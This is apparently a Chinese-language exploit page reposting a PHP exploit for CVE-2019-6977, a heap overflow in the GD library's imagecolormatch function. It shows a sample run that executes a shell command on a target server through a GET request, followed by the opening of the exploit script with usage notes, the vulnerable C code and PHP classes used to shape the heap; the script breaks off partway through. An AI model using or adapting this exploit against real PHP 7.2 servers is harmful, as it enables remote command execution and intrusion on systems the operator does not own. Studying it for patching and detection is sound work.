目录导航
PHP GD 图像处理库 imagecolormatch 堆溢出漏洞利用(CVE-2019-6977) exploit
漏洞详情:https://nvd.nist.gov/vuln/detail/CVE-2019-6977
输出
GET http://target.com/exploit.php?f=0x7fe83d1bb480&c=id+>+/dev/shm/titi
Nenuphar.ce: 0x7fe834a10018
Nenuphar2.ce: 0x7fe834a10d70
Nenuphar.properties: 0x7fe834a01230
z.val: 0x7fe834aaea18
Difference: 0xad7e8
Exploit SUCCESSFUL !
exploit如下 exploit.php
# imagecolormatch() OOB Heap Write exploit
# https://bugs.php.net/bug.php?id=77270
# CVE-2019-6977
# Charles Fol
# @cfreal_
#
# Usage: GET/POST /exploit.php?f=&c=
# Example: GET/POST /exploit.php?f=0x7fe83d1bb480&c=id+>+/dev/shm/titi
#
# Target: PHP 7.2.x
# Tested on: PHP 7.2.12
#
/*
buf = (unsigned long *)safe_emalloc(sizeof(unsigned long), 5 * im2->colorsTotal, 0);
for (x=0; xsx; x++) {
for( y=0; ysy; y++ ) {
color = im2->pixels[y][x];
rgb = im1->tpixels[y][x];
bp = buf + (color * 5);
(*(bp++))++;
*(bp++) += gdTrueColorGetRed(rgb);
*(bp++) += gdTrueColorGetGreen(rgb);
*(bp++) += gdTrueColorGetBlue(rgb);
*(bp++) += gdTrueColorGetAlpha(rgb);
}
The buffer is written to by means of a color being the index:
color = im2->pixels[y][x];
..
bp = buf + (color * 5);
*/
#
# The bug allows us to increment 5 longs located after buf in memory.
# The first long is incremented by one, others by an arbitrary value between 0
# and 0xff.
#
error_reporting(E_ALL);
define('OFFSET_STR_VAL', 0x18);
define('BYTES_PER_COLOR', 0x28);
class Nenuphar extends DOMNode
{
# Add a property so that std.properties is created
function __construct()
{
$this->x = '1';
}
# Define __get
# => ce->ce_flags & ZEND_ACC_USE_GUARDS == ZEND_ACC_USE_GUARDS
# => zend_object_properties_size() == 0
# => sizeof(intern) == 0x50
function __get($x)
{
return $this->$x;
}
}
class Nenuphar2 extends DOMNode
{
function __construct()
{
$this->x = '2';
}</